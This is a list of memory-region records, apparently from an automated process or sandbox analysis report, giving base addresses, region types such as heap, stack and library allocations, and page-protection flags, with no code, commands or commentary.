trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
2A0000
heap
page read and write
4DD3000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
5BA6000
direct allocation
page read and write
50D0000
heap
page read and write
4A7F000
heap
page read and write
83E5000
trusted library allocation
page read and write
E90000
heap
page read and write
8124000
trusted library allocation
page read and write
9280000
unkown
page read and write
9350000
trusted library allocation
page read and write
6BF0000
heap
page read and write
9450000
trusted library allocation
page read and write
8390000
unkown
page read and write
96A0000
trusted library allocation
page read and write
750000
heap
page read and write
92E0000
trusted library allocation
page read and write
4A50000
heap
page read and write
CD5000
heap
page read and write
7C4000
heap
page read and write
9460000
trusted library allocation
page read and write
9370000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
56A7000
heap
page read and write
628E7D000
stack
page read and write
308000
stack
page read and write
2AD721F0000
trusted library allocation
page read and write
9226000
trusted library allocation
page read and write
7541000
heap
page read and write
2795FE5E000
heap
page read and write
92C0000
trusted library allocation
page read and write
21DA9100000
heap
page read and write
4AB3000
heap
page read and write
59C3000
trusted library allocation
page read and write
6012000
trusted library allocation
page read and write
A141000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
2228A647000
heap
page read and write
DF550FF000
stack
page read and write
55FE000
stack
page read and write
4A8F000
heap
page read and write
96F0000
trusted library allocation
page read and write
21D75678000
heap
page read and write
FEA000
unkown
page readonly
6BA7000
direct allocation
page read and write
7C4000
heap
page read and write
9350000
trusted library allocation
page read and write
2AD6CB07000
heap
page read and write
AD5E000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
9670000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
94DF000
trusted library allocation
page read and write
A2F0000
trusted library allocation
page read and write
9100000
unkown
page read and write
7541000
heap
page read and write
96C0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
2AD7221C000
heap
page read and write
9330000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
331B000
heap
page read and write
83A5000
trusted library allocation
page read and write
59CC000
trusted library allocation
page read and write
FE7000
unkown
page read and write
9340000
trusted library allocation
page read and write
2AD6CA00000
heap
page read and write
A2F0000
trusted library allocation
page read and write
21DA9000000
heap
page read and write
9260000
trusted library allocation
page read and write
21D75613000
heap
page read and write
760000
trusted library allocation
page read and write
DF54A7E000
stack
page read and write
21DA905F000
heap
page read and write
9310000
trusted library allocation
page read and write
3050000
heap
page read and write
83F0000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
2AD6CA95000
heap
page read and write
A108000
trusted library allocation
page read and write
4EE0000
trusted library allocation
page read and write
7541000
heap
page read and write
7770000
trusted library allocation
page read and write
50BA000
heap
page read and write
1DAEB140000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
7070000
trusted library allocation
page execute and read and write
7550000
heap
page read and write
9310000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9595000
trusted library allocation
page read and write
E96D77F000
stack
page read and write
9106000
unkown
page read and write
9100000
trusted library allocation
page read and write
55B1000
heap
page read and write
7130000
trusted library allocation
page read and write
4DF7000
trusted library allocation
page execute and read and write
9140000
trusted library allocation
page read and write
E96D87D000
stack
page read and write
580000
remote allocation
page read and write
7450000
direct allocation
page read and write
C60000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
2AD6CAA0000
heap
page read and write
96A5000
trusted library allocation
page read and write
55BC000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
53EE000
stack
page read and write
271548E1000
heap
page read and write
4EE0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
4F80000
heap
page read and write
85E000
stack
page read and write
71F0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
8385000
trusted library allocation
page read and write
21DA905A000
heap
page read and write
71E0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
EE7000
heap
page read and write
4EC8000
trusted library allocation
page read and write
92C7000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
2795FE5D000
heap
page read and write
4C75000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
EDA000
heap
page read and write
9680000
trusted library allocation
page read and write
5694000
heap
page read and write
2AD720E0000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
4C10000
trusted library allocation
page read and write
62957F000
stack
page read and write
4840000
direct allocation
page execute and read and write
9116000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
5C80000
direct allocation
page read and write
92C0000
trusted library allocation
page read and write
A1C0000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
A0D0000
trusted library allocation
page read and write
7250000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
9370000
trusted library allocation
page read and write
7541000
heap
page read and write
9130000
trusted library allocation
page read and write
8180000
trusted library allocation
page read and write
2AD72110000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
4EE0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
2228A64A000
heap
page read and write
9450000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
2AD72410000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
9FE000
stack
page read and write
93EE000
stack
page read and write
AF00000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
478F000
stack
page read and write
95D0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
2795FE82000
heap
page read and write
95E0000
trusted library allocation
page read and write
C040000
trusted library allocation
page read and write
BA7331B000
stack
page read and write
2FF2000
heap
page read and write
AEF0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
4FB4000
heap
page read and write
A0E7000
trusted library allocation
page read and write
A1C0000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
71C0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
54F0000
heap
page read and write
9110000
trusted library allocation
page read and write
54BE000
stack
page read and write
56D8000
heap
page read and write
E80000
trusted library section
page read and write
4FAE000
heap
page read and write
1B4F4EB0000
heap
page read and write
D1E2EFB000
stack
page read and write
9128000
trusted library allocation
page read and write
56F3000
heap
page read and write
1B4F5029000
heap
page read and write
83C0000
trusted library allocation
page read and write
936C000
unkown
page read and write
83A0000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
6FC000
stack
page read and write
83A0000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
2228A649000
heap
page read and write
56C5000
heap
page read and write
3005000
heap
page read and write
71F0000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
1E185402000
heap
page read and write
5900000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
BF83000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
A0FE000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9220000
unkown
page read and write
8385000
unkown
page read and write
12C0000
direct allocation
page execute and read and write
27960802000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
FB8B4FC000
stack
page read and write
9110000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
A120000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
E60000
heap
page read and write
7CC000
stack
page read and write
2E3F884A000
heap
page read and write
A0C0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
7D0000
direct allocation
page read and write
95D0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
5FF8000
trusted library allocation
page read and write
580000
remote allocation
page read and write
EC7E27F000
stack
page read and write
95C0000
unkown
page read and write
56C3000
heap
page read and write
9260000
trusted library allocation
page read and write
9115000
unkown
page read and write
AEF0000
trusted library allocation
page read and write
11CE000
stack
page read and write
2E3F8750000
heap
page read and write
9330000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
92B0000
trusted library allocation
page execute and read and write
72D4000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
56D1000
heap
page read and write
95C0000
unkown
page read and write
9130000
trusted library allocation
page read and write
912D000
trusted library allocation
page read and write
4F7B000
heap
page read and write
9520000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
9370000
trusted library allocation
page read and write
ACF0000
trusted library allocation
page read and write
2228A668000
heap
page read and write
96E000
stack
page read and write
1DAEB257000
heap
page read and write
9EC000
stack
page read and write
94D0000
trusted library allocation
page read and write
8200000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
94E3000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
2BB1000
stack
page read and write
21DA905C000
heap
page read and write
8130000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
2AD6D558000
heap
page read and write
539E000
stack
page read and write
A0F0000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
4FC3000
heap
page read and write
1B4F57C0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
7150000
heap
page execute and read and write
9110000
trusted library allocation
page read and write
2AD6CB00000
heap
page read and write
5FE000
stack
page read and write
21D75600000
heap
page read and write
AF50000
trusted library allocation
page read and write
316D000
stack
page read and write
7541000
heap
page read and write
A0D0000
trusted library allocation
page read and write
BD62000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
EC7DAAC000
stack
page read and write
96D0000
trusted library allocation
page read and write
ACEF000
stack
page read and write
83A5000
unkown
page read and write
9115000
trusted library allocation
page read and write
AF60000
trusted library allocation
page read and write
11A167B000
stack
page read and write
5668000
heap
page read and write
92C0000
trusted library allocation
page read and write
55B1000
heap
page read and write
7230000
trusted library allocation
page read and write
4DFB000
trusted library allocation
page execute and read and write
9120000
trusted library allocation
page read and write
AEF5000
trusted library allocation
page read and write
73E0000
trusted library allocation
page read and write
C257000
trusted library allocation
page read and write
21DA909C000
heap
page read and write
95C0000
unkown
page read and write
9690000
trusted library allocation
page read and write
2BA5AC70000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
9580000
trusted library allocation
page read and write
9110000
unkown
page read and write
1E185400000
heap
page read and write
4C81000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
A2F0000
trusted library allocation
page read and write
108F000
stack
page read and write
92C0000
trusted library allocation
page read and write
2AD72200000
heap
page read and write
71C0000
trusted library allocation
page read and write
1E1853C0000
trusted library allocation
page read and write
70D0000
trusted library allocation
page read and write
2228A655000
heap
page read and write
7110000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
940000
heap
page read and write
9452000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
2E3F9080000
remote allocation
page read and write
96E0000
trusted library allocation
page read and write
BF97000
trusted library allocation
page read and write
C90000
trusted library allocation
page read and write
A0F0000
trusted library allocation
page read and write
93B0000
unkown
page read and write
9127000
trusted library allocation
page read and write
83E5000
trusted library allocation
page read and write
4B30000
heap
page read and write
2795FE6E000
heap
page read and write
9220000
trusted library allocation
page read and write
370000
remote allocation
page read and write
62917D000
stack
page read and write
93F0000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
92C1000
trusted library allocation
page read and write
91D0000
trusted library allocation
page read and write
E1B307E000
stack
page read and write
2AD6D3D0000
trusted library allocation
page read and write
5930000
heap
page read and write
92A0000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
4EE0000
trusted library allocation
page read and write
4A90000
heap
page read and write
73E0000
trusted library allocation
page read and write
5B5F000
stack
page read and write
4EA0000
heap
page read and write
9410000
trusted library allocation
page read and write
A1B0000
trusted library allocation
page read and write
96A0000
unkown
page read and write
C40000
trusted library allocation
page read and write
7520000
heap
page read and write
AFC0000
trusted library allocation
page read and write
5610000
heap
page read and write
9100000
unkown
page read and write
A100000
trusted library allocation
page read and write
56FE000
heap
page read and write
8390000
unkown
page read and write
A0C0000
trusted library allocation
page read and write
56D4000
heap
page read and write
96B0000
trusted library allocation
page read and write
4F7E000
heap
page read and write
940000
remote allocation
page read and write
4FD3000
heap
page read and write
70A0000
trusted library allocation
page read and write
2BA5AE02000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
7169000
trusted library allocation
page read and write
9360000
unkown
page read and write
9110000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
7240000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
510E000
heap
page read and write
96C0000
trusted library allocation
page read and write
5714000
heap
page read and write
9260000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
55FD000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
4CB7000
trusted library allocation
page read and write
4C90000
heap
page read and write
A1E0000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
2AD71FC0000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
AF40000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
21DA8F50000
heap
page read and write
9120000
unkown
page read and write
8390000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
60D0000
heap
page read and write
7541000
heap
page read and write
4F50000
trusted library allocation
page read and write
6BB2000
direct allocation
page read and write
EC7DB2E000
stack
page read and write
96A0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
9100000
unkown
page read and write
92C0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
8D8000
stack
page read and write
B0B0000
trusted library allocation
page read and write
71E0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
2AD6D518000
heap
page read and write
AEF0000
trusted library allocation
page read and write
7541000
heap
page read and write
71D0000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
83B7000
trusted library allocation
page read and write
BA73B7F000
stack
page read and write
9100000
unkown
page read and write
9255000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
6D856000
unkown
page readonly
A100000
trusted library allocation
page read and write
FB8BA7F000
stack
page read and write
54C0000
trusted library allocation
page read and write
5410000
remote allocation
page read and write
5FF2000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
6F50000
direct allocation
page read and write
A1E0000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
4910000
trusted library allocation
page read and write
92A0000
unkown
page read and write
2228A648000
heap
page read and write
A100000
trusted library allocation
page read and write
62967F000
stack
page read and write
95E0000
trusted library allocation
page read and write
4FE5000
heap
page read and write
4C76000
trusted library allocation
page read and write
95CA000
trusted library allocation
page read and write
30A5000
heap
page read and write
8E0000
heap
page read and write
8261000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
E1B2DCB000
stack
page read and write
B050000
trusted library allocation
page read and write
3007000
heap
page read and write
2AD6CA7B000
heap
page read and write
9105000
unkown
page read and write
7541000
heap
page read and write
4B80000
heap
page read and write
9660000
trusted library allocation
page read and write
9110000
unkown
page read and write
900000
heap
page read and write
96A0000
trusted library allocation
page read and write
4F70000
heap
page read and write
AF50000
trusted library allocation
page read and write
568B000
heap
page read and write
AEF0000
trusted library allocation
page read and write
93B0000
trusted library allocation
page read and write
ECD000
heap
page read and write
D8E000
stack
page read and write
5360000
direct allocation
page execute and read and write
9160000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
1DAEB289000
heap
page read and write
9640000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
8398000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
322F000
stack
page read and write
D1E33FF000
stack
page read and write
92D0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
49E0000
trusted library allocation
page read and write
A1C0000
trusted library allocation
page read and write
2F40000
heap
page read and write
94D0000
trusted library allocation
page read and write
9124000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
54C2000
trusted library allocation
page read and write
568B000
heap
page read and write
9450000
trusted library allocation
page read and write
7541000
heap
page read and write
83B7000
unkown
page read and write
21DA9056000
heap
page read and write
96C0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
82F2000
trusted library allocation
page read and write
580000
remote allocation
page read and write
D1E25CB000
stack
page read and write
8490000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
27154829000
heap
page read and write
95B0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
96E6000
trusted library allocation
page read and write
2B50000
heap
page read and write
7F0000
remote allocation
page read and write
9450000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
91D5000
trusted library allocation
page read and write
55B3000
trusted library allocation
page read and write
83E0000
unkown
page read and write
2795FE2A000
heap
page read and write
96A0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
AF70000
trusted library allocation
page read and write
2AD6D3D3000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
71DD000
trusted library allocation
page read and write
A0F0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9360000
trusted library allocation
page read and write
B100000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
558F000
heap
page read and write
92A3000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
6042000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
9500000
unkown
page read and write
9690000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
5FED000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
7541000
heap
page read and write
BB95000
trusted library allocation
page read and write
56EA000
heap
page read and write
9540000
unkown
page read and write
92C0000
trusted library allocation
page read and write
524F000
stack
page read and write
2E3F87B0000
heap
page read and write
A1E0000
trusted library allocation
page read and write
84E2C7E000
stack
page read and write
73E8000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
4DC4000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
50CC000
stack
page read and write
1E18543F000
heap
page read and write
AF40000
trusted library allocation
page read and write
9340000
trusted library allocation
page execute and read and write
83A0000
trusted library allocation
page read and write
9324000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9430000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
A120000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
A120000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
AF50000
trusted library allocation
page read and write
DF54AFE000
stack
page read and write
92A0000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
7541000
heap
page read and write
2228A666000
heap
page read and write
8A0000
remote allocation
page read and write
854000
heap
page read and write
F6E000
heap
page read and write
83C0000
trusted library allocation
page read and write
2E3F8802000
heap
page read and write
9F9000
stack
page read and write
92E0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
6F92000
direct allocation
page read and write
73D0000
trusted library allocation
page read and write
2AD72440000
remote allocation
page read and write
9300000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
5561000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
4F59000
stack
page read and write
2228A64F000
heap
page read and write
5594000
trusted library allocation
page read and write
51F0000
heap
page read and write
6AE0000
direct allocation
page read and write
9125000
trusted library allocation
page read and write
2AD6D502000
heap
page read and write
96A0000
trusted library allocation
page read and write
6D85D000
unkown
page read and write
9350000
trusted library allocation
page read and write
FB8B1FC000
stack
page read and write
48F1000
heap
page read and write
A2E0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
4D0F000
heap
page read and write
9310000
trusted library allocation
page read and write
326E000
stack
page read and write
92B0000
trusted library allocation
page read and write
A1B0000
trusted library allocation
page read and write
4FF2000
heap
page read and write
A0E0000
trusted library allocation
page read and write
930B000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
2BA5A43C000
heap
page read and write
AF40000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
4C6F000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
83C6000
trusted library allocation
page read and write
4EB0000
trusted library allocation
page readonly
56F3000
trusted library allocation
page read and write
55DE000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
4FB2000
heap
page read and write
AF60000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
21DA905D000
heap
page read and write
2FA8000
heap
page read and write
58EB000
trusted library allocation
page read and write
56D1000
heap
page read and write
4F80000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
D80000
unkown
page readonly
E96D47C000
stack
page read and write
C70000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
2E3F9080000
remote allocation
page read and write
96F5000
trusted library allocation
page read and write
4CE2000
trusted library allocation
page read and write
9240000
trusted library allocation
page read and write
7541000
heap
page read and write
27154740000
heap
page read and write
A0C0000
trusted library allocation
page read and write
713C000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
8390000
unkown
page read and write
A150000
trusted library allocation
page execute and read and write
96C0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
5106000
heap
page read and write
9220000
trusted library allocation
page read and write
2795FE61000
heap
page read and write
95D0000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
73E0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
A0D0000
trusted library allocation
page read and write
96E0000
unkown
page read and write
9500000
trusted library allocation
page read and write
400000
unkown
page readonly
70A0000
trusted library allocation
page read and write
A23E000
stack
page read and write
95D0000
trusted library allocation
page read and write
A369000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
DD4000
heap
page read and write
92C0000
trusted library allocation
page read and write
4A10000
heap
page read and write
A0D9000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
552F000
stack
page read and write
8250000
trusted library allocation
page read and write
2AD6CA59000
heap
page read and write
3B0000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
9340000
trusted library allocation
page read and write
A71E000
stack
page read and write
A100000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
4CAD000
trusted library allocation
page read and write
4C81000
trusted library allocation
page read and write
FB8B37F000
stack
page read and write
9460000
trusted library allocation
page read and write
7760000
trusted library allocation
page read and write
2228A643000
heap
page read and write
61D0000
trusted library allocation
page read and write
73E0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
2AD722D4000
heap
page read and write
92A0000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
C1C4000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
1DAEB200000
heap
page read and write
A100000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
DF54BFB000
stack
page read and write
A1D0000
trusted library allocation
page read and write
5BC0000
direct allocation
page read and write
B0FB000
trusted library allocation
page read and write
5B60000
direct allocation
page read and write
21D75702000
heap
page read and write
8390000
trusted library allocation
page read and write
4EE0000
trusted library allocation
page read and write
21D755C0000
trusted library allocation
page read and write
2E3F9202000
trusted library allocation
page read and write
6AC1000
direct allocation
page read and write
9260000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
A2F0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
A120000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
C61000
trusted library allocation
page read and write
AD45000
trusted library allocation
page read and write
9250000
trusted library allocation
page read and write
1DAEB276000
heap
page read and write
4D0F000
heap
page read and write
B030000
trusted library allocation
page read and write
9425000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
E67000
heap
page read and write
9260000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
50BD000
heap
page read and write
7090000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
2AD6CA8F000
heap
page read and write
A34E000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
32F0000
heap
page read and write
ED1000
unkown
page execute read
2F76000
heap
page read and write
101B000
stack
page read and write
9260000
trusted library allocation
page read and write
9530000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
83E0000
unkown
page read and write
9355000
unkown
page read and write
96F0000
trusted library allocation
page read and write
9270000
trusted library allocation
page read and write
DD0000
heap
page read and write
517000
unkown
page read and write
9420000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
9110000
unkown
page read and write
9360000
trusted library allocation
page read and write
7C4000
heap
page read and write
A140000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
9587000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
8385000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
51A000
unkown
page readonly
A100000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
6AE6000
direct allocation
page read and write
9300000
trusted library allocation
page read and write
ADE000
stack
page read and write
83E5000
unkown
page read and write
95E2000
trusted library allocation
page read and write
91D0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
5605000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
AF40000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
2228A64C000
heap
page read and write
92C0000
trusted library allocation
page read and write
6B40000
direct allocation
page read and write
92A0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
8140000
trusted library allocation
page read and write
8A0000
remote allocation
page read and write
56F3000
heap
page read and write
9100000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
770000
heap
page read and write
92A0000
trusted library allocation
page read and write
A0EE000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
5C0000
trusted library allocation
page read and write
4B81000
heap
page read and write
27154913000
heap
page read and write
9120000
trusted library allocation
page read and write
1DAEB313000
heap
page read and write
9110000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
595E000
stack
page read and write
92A0000
trusted library allocation
page read and write
568D000
heap
page read and write
83B0000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
4FED000
stack
page read and write
DF54CFB000
stack
page read and write
83E0000
unkown
page read and write
9453000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
2AD720EE000
trusted library allocation
page read and write
51A000
unkown
page readonly
A69E000
stack
page read and write
96A0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
AF05000
trusted library allocation
page read and write
7166000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
CFB000
stack
page read and write
BF19000
trusted library allocation
page read and write
559F000
stack
page read and write
AF50000
trusted library allocation
page read and write
9150000
unkown
page read and write
9450000
trusted library allocation
page read and write
